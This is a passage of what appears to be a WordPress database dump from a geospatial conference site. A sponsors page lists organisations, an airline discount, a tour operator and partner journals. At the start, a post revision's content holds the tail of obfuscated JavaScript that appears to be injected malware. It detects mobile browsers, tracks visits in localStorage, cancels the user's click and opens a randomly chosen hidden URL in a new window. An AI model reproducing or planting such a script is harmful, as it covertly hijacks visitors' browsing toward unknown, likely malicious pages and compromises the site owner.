ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:25:35','2023-08-16 00:25:35','',3066,'https://gsw2023.com/?p=5249',0,'revision','',0),
(5250,1,'2023-08-16 00:26:42','2023-08-16 00:26:42','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a 